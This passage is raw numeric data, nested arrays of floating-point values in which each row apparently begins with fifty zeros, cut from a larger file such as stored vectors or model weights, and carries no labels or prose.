0.1534, -0.813, 0.1357, 0.1664, -0.3604, 0.1315, -0.259, -0.07086, 0.1475, -0.1802, -0.08295, 0.0682, 0.2064, -0.04852, -0.04666, -0.522, 0.2074, -0.3384, -0.0305, -0.1658, -0.085, -0.0542, 0.1462, 0.04712, -0.02094, 0.06525, 0.2625, 0.07825, 0.10364, -0.04855, 0.0826, -0.9946, -1.012, -2.541, -0.05692, 
0.07367, -0.1405, -0.1409, 0.0676, 0.4104, -0.1611, -1.443, 0.04193, 0.118, 0.04492, -0.12256, -0.383], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0692, -0.0594, -0.02664, -0.03806, -0.3794, -0.0513, -0.8477, 0.2642, 0.01523, -0.1943, -0.001689, -0.1025, 0.0698, 0.10754, 0.1663, 0.1045, -0.1098, -0.0569, -0.02197, 0.04733, -0.0874, 0.075, 0.3809, -0.735, -3.537, 0.05588, -2.016, -0.0331, 0.04807, -0.2334, 0.01843, -0.511, -0.0248, -2.42, -0.3137, -0.07544, 0.1271, 0.0944, 0.1908, -0.0671, 0.0566, 0.06934, -0.4705, -0.2295, 0.1965, 0.0775, -0.06995, 0.1359, -0.601, -0.1126], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6216, 0.3718, -2.426, -0.12274, -6.613, -0.6924, 0.1268, 0.641, -0.196, 0.02802, -0.3357, -0.4377, 0.4329, -0.1927, 0.004383, -2.1, -0.1202, -0.8823, 0.1298, 0.1345, 0.2744, 0.11633, 1.035, -0.1149, -4.61, -2.197, 0.0469, -0.472, -0.3223, -0.2329, -0.07654, -0.1222, -0.5444, 1.09, -0.2937, -0.8105, 1.364, 0.3362, 0.1267, -0.2258, 0.4517, -0.1722, 0.2214, 0.3535, -1.502, 0.00829, -0.3376, -0.3723, 0.1064, -0.835], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.02165, -0.1907, -1.144, -0.5654, -1.216, -0.1699, 0.6943, 0.1659, -0.176, 0.0697, -0.1416, -0.4246, 0.537, -0.1355, -0.13, 1.218, -0.3508, 0.05923, -0.06238, -0.0193, -0.4202, -0.02402, -0.239, -0.05417, 0.548, 0.03378, -0.1056, -0.4763, 0.2313, -0.2054, -0.2095, -0.1459, 0.2035, 
0.9956, -0.3362, 0.00425, 0.845, 0.10333, 0.0845, -0.4187, 0.1848, -0.1643, -0.1133, 0.07715, 0.0693, -0.02443, -0.224, -0.296, -0.1556, 0.4502], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1666, -0.000572, -0.10736, -0.005157, 0.03894, -0.2769, -0.5986, 0.2479, -0.11975, 0.0829, -0.2347, 0.05502, -0.02719, 0.1747, -0.3713, 0.5664, -0.1326, -0.2856, -0.933, 0.3423, 0.2478, -0.2212, 0.686, -0.3809, -1.018, 0.098, -3.555, -1.104, -0.02637, -0.4143, -0.04703, 0.07855, 0.0791, 0.5986, -0.2118, 0.3838, -0.09717, -0.1987, 0.1296, -0.2311, -1.83, -0.01582, -0.08264, -0.2063, -0.6245, -0.2238, -0.07434, -0.1545, 0.423, -0.359], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1855, -0.0783, 0.04053, -0.09735, 0.1533, -0.277, 0.01793, 0.01247, -0.1641, -0.1632, -0.01487, 0.0184, 0.1537, 0.01264, 0.08167, 0.632, -0.072, 0.11176, -0.2952, 0.1068, -0.177, -0.0833, 1.31, 0.01842, 0.6587, 0.169, 0.08716, -0.05884, -0.0951, 0.169, -0.02318, 0.001552, 0.2157, -0.09735, -0.1707, -1.259, 0.1737, -0.1927, 0.2057, -0.2634, 0.00805, -0.09753, 0.03192, 0.1367, 0.2201, 0.02016, -0.01368, 0.006325, -0.2241, -0.1738], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0285, -0.08026, -0.0191, -0.03128, 0.1511, -0.002844, -0.001318, -0.01217, -0.0441, 0.0754, -0.01833, -0.03568, 0.0512, 0.05103, -0.02354, 0.02104, -0.013245, -0.03093, -0.0924, 0.01196, 0.013435, 0.05078, 0.1398, 
-0.01354, 0.1588, 0.01456, 0.0385, -0.0462, 0.01738, 0.165, -0.02638, -0.04434, 0.001972, 0.303, -0.1815, -0.04184, 0.03613, 0.02884, -0.1105, -0.0672, 0.04688, 0.001576, 0.04202, -0.02197, 0.0712, 0.11896, 0.01413, 0.2162, -0.04785, 0.09186], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2974, -0.11847, 0.2129, 0.263, 0.0218, 0.1793, -0.0089, 0.2803, 0.2842, 0.4668, 0.10046, -0.1313, 0.3132, -0.3438, -0.06244, 0.0719, 0.05557, 0.4033, -0.01598, -0.551, -0.544, -0.1676, -0.015366, -0.271, 0.002476, -0.3796, -0.3843, 0.2051, -0.2476, 0.4258, -0.1812, 0.3608, -0.4377, -0.311, -0.11426, 0.1377, 0.0675, 0.8726, -0.8237, -0.3513, -0.141, 0.334, -0.7876, 0.2146, -0.2642, -0.2017, 0.126, -0.4822, -0.6675, -0.5273], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0741, -0.07294, 0.02438, 0.0169, 0.1354, -0.1271, 0.04672, 0.1373, -0.02623, 0.1351, -0.01274, 0.05722, 0.1759, -0.04858, -0.00966, 0.6753, -0.00141, 0.0632, -0.3748, 0.0958, 0.1085, -0.03323, 0.5273, -0.1694, 0.245, -0.014496, -0.0655, -0.02611, -0.02997, 0.2773, -0.01604, 0.03525, 0.0993, 0.0684, -0.06433, -0.3162, -0.05215, -0.06995, -0.1445, -0.05908, 0.04037, -0.0161, -0.0587, -0.02716, 0.0432, 0.1228, -0.03195, 0.1799, -0.2264, -0.02826], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.257, -0.10706, 0.008026, -0.05475, 0.1564, -0.03168, 0.3853, 0.0702, -0.1548, 0.1775, 0.00978, 0.01866, 0.1946, 
0.0855, -0.1061, 0.2155, -0.05942, 0.0508, -0.10205, 0.009796, 0.08984, -0.1077, 0.2007, -0.1665, -0.114, -0.11273, -0.06192, 0.04575, -0.1696, -0.0963, -0.0727, 0.01935, 0.128, 0.2341, 0.0685, 0.003925, 0.1512, -0.078, 0.03168, -0.001691, -0.6484, -0.08374, -0.01449, 0.000799, 0.04514, -0.0661, 0.02194, 0.0372, 0.03494, 0.231], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.716, -0.1665, -0.2126, -0.134, 0.2776, -2.818, -0.799, 0.2162, -0.2642, -0.1533, 0.072, 0.1688, 0.381, 0.616, -0.3672, 0.5776, -0.0956, -0.2194, 0.6743, -0.3022, 0.3848, 0.2825, -0.3218, -0.1404, -0.393, -0.3005, 0.898, -0.1506, 0.1362, -0.04684, -0.11066, 0.1602, -0.2554, -0.3064, -0.2925, -1.805, 0.2067, 0.3315, -0.127, -0.1296, 0.1877, 0.1603, 0.1373, 0.1142, -0.1353, -0.02565, -0.06165, 0.12384, -0.2542, -0.1964], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.9795, -0.12366, 0.2612, -2.977, 0.3777, -0.3418, 0.05872, 0.577, -0.05722, 0.01706, -0.05267, -0.007725, 0.8047, -0.583, -0.2341, 0.8765, 0.01251, -0.7188, 0.007774, 0.1295, 0.7896, -0.2095, -0.9644, 0.2001, -0.8755, -0.4429, -0.04895, 0.546, -0.5264, 0.9546, 0.0359, 0.010345, 0.5054, 0.752, 0.504, 0.08325, 1.853, 0.02042, 0.7217, 0.2367, -0.134, -0.383, 0.6484, 0.4763, -0.2054, -0.3154, -0.2018, -0.8325, 0.2285, 0.1981], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0211, -0.166, -0.00547, -0.1077, 0.2952, 0.01703, 
-0.08716, 0.1506, -0.11755, 0.0802, -0.02928, -0.09735, -0.1803, 0.1298, 0.081, -0.0983, -0.0864, 0.2101, -0.1273, 0.01068, 0.00659, 0.07495, 0.4321, -0.1436, 0.9746, 0.0917, 0.01761, -0.09735, -0.0364, -0.0709, -0.05646, -0.08844, 0.10785, 0.5137, -0.3567, -0.09143, 0.006203, -0.0723, -0.1637, -0.1268, 0.0731, -0.03732, 0.1622, -0.1796, 0.1153, 0.1973, -0.0972, 0.2397, -0.47, 0.2186], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3645, -0.132, 0.0804, -0.09454, -0.776, -0.691, -0.04773, 0.2837, -0.4602, 0.0887, -0.04724, -0.0978, -0.503, 0.3315, 0.0804, -0.5527, 0.0254, 0.654, -0.0731, 0.2573, 0.3027, -0.08246, -0.2498, -0.2269, -1.021, -0.1608, 0.3413, 0.0646, -1.176, 0.1223, -0.11316, -0.0796, -0.3618, 0.2255, -0.04962, -0.04813, -0.03052, 0.2373, -0.2905, 0.01231, 0.0651, 0.1804, -0.362, -0.1892, -0.1473, -0.013954, -0.2646, 0.1534, -0.06934, 0.1012], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3965, 0.01324, -0.1672, -0.0365, 0.1433, -1.376, 0.0661, 0.0676, -0.2844, 0.10767, -0.09796, -0.03812, 0.261, -0.0851, 0.06793, 0.3394, -0.2085, 0.005447, -0.01329, 0.1173, 0.1155, -0.02196, 1.088, -0.2115, 0.457, 0.02132, 0.297, -0.2869, 0.1052, -0.264, -0.02362, -0.006573, -0.02121, -0.4846, 0.1581, -0.01451, 0.3335, 0.1896, 0.08105, -0.1254, -0.1425, 0.0134, -0.2278, 0.0819, 0.07074, -0.02495, -0.05075, -0.03537, -0.53, 0.1139], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, -0.04355, -0.01338, -0.03087, -0.01492, 0.1332, -0.2301, 0.02432, 0.2954, -0.06305, 0.0525, -0.0313, -0.01636, 0.1093, 0.015366, -0.3914, 0.31, 0.01573, -0.26, -0.3816, 0.1389, 0.079, -0.1117, 0.507, -0.106, 0.37, -0.3357, -0.1858, -0.2152, -0.0703, 0.509, 0.004612, -0.05283, 0.1057, 0.023, -0.1152, 0.0374, 0.3013, 0.0934, -0.309, -0.198, -0.2878, -0.1525, 0.03152, 0.10156, 0.117, -0.03069, -0.03644, 0.104, 0.2413, -0.04654], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.03284, -0.03128, -0.006504, 0.03754, 0.0145, 0.0341, -0.02911, -0.0088, -0.01244, -0.01253, -0.006042, -0.0431, 0.0446, -0.03394, -0.03735, -0.0314, -0.0338, 0.004395, -0.02596, -0.01782, -0.02109, -0.02737, -0.0333, 0.00974, 0.04626, 0.02473, -0.03455, -0.05618, -0.01081, -0.02747, -0.02187, 0.02113, -0.02231, -0.05228, -0.0002987, -0.005833, -0.0255, -0.03885, -0.015114, -0.0767, 0.01013, -0.005066, 0.01956, -0.013885, 0.02126, -0.004192, -0.06995, 0.005566, 0.03906, -0.02011], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.883, 0.31, 0.0772, -0.132, 0.1512, 0.818, 0.866, 0.6094, -0.11224, 0.4426, 0.0426, -0.2448, -0.03653, 0.01417, 0.535, 0.4377, -1.442, -1.414, -2.729, -0.1624, -0.7827, -0.5723, 0.0479, -0.2505, 0.562, 0.4001, 0.3054, -0.828, -0.01807, 0.28, -0.9272, -0.2573, 0.1829, 0.567, 0.7744, 0.3489, 1.202, 0.886, 0.022, -0.2622, -0.2905, 0.4463, -0.3235, 0.05222, 0.2656, -0.2466, 0.3416, 0.05286, 0.789, -0.1025], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1093, -0.157, -0.007187, -0.05124, 0.3013, -0.0865, 0.12134, 0.0922, -0.09045, -0.3123, -0.00102, -0.00226, -0.127, 0.1425, 0.1487, -0.2434, -0.03275, 0.1595, 0.005753, 0.11993, -0.04544, -0.0655, 0.4297, 0.0622, 2.045, -0.1472, 0.1526, 0.05057, 0.01744, 0.06323, -0.089, 0.03647, -0.2324, 0.098, -0.1245, -0.01437, 0.3215, 0.1183, -0.03024, -0.00541, -0.00901, 0.04245, -0.0964, -0.09357, 0.2017, -0.0432, -0.131, 0.09894, 0.2449, -0.011314], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06836, 0.01068, 0.003902, 0.144, -4.18, 0.1481, 0.4985, -0.3005, -0.06506, 0.1251, 0.01863, -0.06866, -0.7104, -0.2092, 0.01465, 0.2003, -0.0246, -2.674, -0.00197, 0.2285, 0.00863, -0.0715, 0.726, -0.0369, -0.1483, -0.03693, -0.1726, -0.01674, -0.001829, 0.61, -0.01461, -0.0003722, 0.02638, -0.0435, -0.3118, -0.01334, 0.671, 0.2462, 0.4238, -0.0913, -0.05203, -0.10205, -0.388, 0.0268, -0.1857, -0.04028, 0.03503, -0.19, 0.0773, 0.005733], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4143, -0.031, 0.3164, 0.2031, -1.811, -0.2032, 0.391, -0.6875, -0.2335, -0.0612, 0.0357, -0.6914, -2.441, 0.0687, 0.03107, 0.2186, -0.1604, 0.2305, -0.7075, -0.63, 0.0006275, 0.3801, 3.123, 0.3384, 0.0994, 0.661, -1.21, 0.02837, -0.05347, 1.106, 0.08264, -0.2517, 0.318, 0.0587, 0.059, 0.061, 0.673, -0.04593, 0.1747, -0.1125, -0.3499, 0.137, -0.4658, -1.82, -0.585, -0.1555, -0.132, 0.1976, 0.08563, -0.1658], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1052, -0.00975, 0.001682, 0.01971, -0.4038, -0.2485, 0.4077, 0.0332, -0.1665, 0.0851, -0.2198, -0.4258, 0.07556, 0.3665, -0.1681, 0.1757, -0.1516, 0.05807, -0.209, -0.3882, -0.0508, -0.01591, 0.5244, -0.0796, 0.297, -0.0927, -0.0709, -0.0728, 0.1442, 0.2266, -0.04105, 0.14, -0.0443, 0.4421, 0.02585, 0.098, -0.0806, 0.1431, -0.09265, -0.00334, 0.2092, 0.00749, 0.0824, 0.1718, -0.233, 0.08234, 0.0857, 0.2915, 0.09467, -0.1558], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.8423, -0.67, 0.2505, -0.04272, -0.1748, -2.14, -0.59, 1.055, 0.5947, -0.6006, 0.2917, 0.01443, -1.766, -0.2085, -0.3013, -1.679, -0.9575, 1.17, -0.903, -0.8555, 0.922, -0.6772, 0.4739, -0.4087, -1.858, 0.2717, -1.245, 0.567, 0.3945, -1.168, 0.0353, 0.25, -0.6914, 0.229, -0.246, 0.1433, -2.994, 1.096, 0.57, 0.05676, 0.09424, 0.2803, -0.259, 0.728, 0.225, -0.1953, -5.57, 0.0689, 1.073, -1.581], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.027, 0.4558, -0.5444, -1.033, 0.752, -0.495, 0.02956, 0.2104, 0.0982, -0.5103, -0.1725, 0.2097, -2.56, -0.666, -1.284, -0.2496, -0.007557, 0.3994, -0.3757, 0.04477, 0.3884, -0.1005, 0.10236, 0.002953, -0.5493, -0.752, -0.373, -0.5596, -0.3188, 0.411, -0.1304, 0.08405, 0.04272, -0.5845, -0.0704, -0.02223, -4.08, 0.5435, -0.1377, -0.0977, 0.0546, -0.69, -0.688, -0.2783, 1.373, -0.4055, -0.6846, -0.7017, 0.2152, -5.74], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1324, 0.00654, -0.1819, -0.1835, -0.007343, 0.0619, -0.0766, 0.00871, -0.2347, -0.1487, -0.1451, 0.03123, 0.1566, -0.1395, -0.224, -1.787, -0.008545, 0.1399, -0.02167, 0.2091, -0.8413, 0.2198, 0.6353, -0.3333, -0.8716, -0.1318, 0.476, -0.0629, -0.1493, 0.2654, 0.06866, -0.1454, -0.3398, 0.711, -0.0699, 0.0957, -0.705, -0.0314, 0.3762, -0.63, -0.697, 0.2378, -0.1492, -0.4048, 0.03345, 0.1593, -0.2969, -0.04074, -0.1821, 0.04947], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2878, -0.04678, -0.1312, -0.126, 0.352, -1.78, 0.1328, 0.07574, -0.01205, 0.1649, -0.09625, 0.12024, -0.2996, -0.1678, 0.348, 0.4746, -0.11005, 0.103, -0.1847, 0.2046, -0.4634, 0.05316, 1.322, -0.5527, 0.2249, 0.05713, 0.565, -0.311, -0.01859, 0.2029, -0.11707, 0.04736, -0.4048, 0.08246, -0.2095, -0.0879, 0.1432, 0.1238, -0.4346, -0.1487, 0.01452, -0.0946, -0.1515, -0.1661, -0.1255, 0.10754, -0.2795, 0.01128, 0.7266, -0.2242], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1423, -0.814, -0.4043, -0.37, -0.4521, -0.9014, 0.88, 0.784, -0.207, 0.3928, 0.04895, -0.1671, -3.959, 0.8975, -0.4421, 0.894, -0.4824, -0.003756, 0.3464, -0.0681, 1.045, 0.4707, 2.484, 0.0976, -1.011, -0.28, -2.115, -0.214, -0.4275, 0.1058, -0.7705, -0.506, -0.02774, 1.219, -0.2966, 0.1089, 1.753, -1.194, 1.025, -0.4094, -1.017, -0.3862, -0.2211, -0.4783, 0.002945, -0.6226, 0.1787, -1.928, 0.368, 0.602], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1036, -0.072, 0.0896, -0.05435, 0.0914, -0.10046, 0.5874, 0.2426, -0.2712, 0.1313, -0.03336, -0.05667, -0.0901, 0.10065, -0.1174, -0.04797, -0.001166, 0.2244, -0.1311, 0.0708, 0.112, -0.05707, 0.4226, -0.35, 1.158, 0.0002906, 0.0681, 0.013855, -0.11395, 0.02821, -0.11053, -0.1154, -0.0223, 0.2827, -0.1307, 0.00399, 0.3125, 0.07477, -0.3333, -0.1545, -0.04248, -0.121, -0.05402, 0.1836, 0.04077, -0.02129, 0.01513, 0.04218, 0.468, 0.11847], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 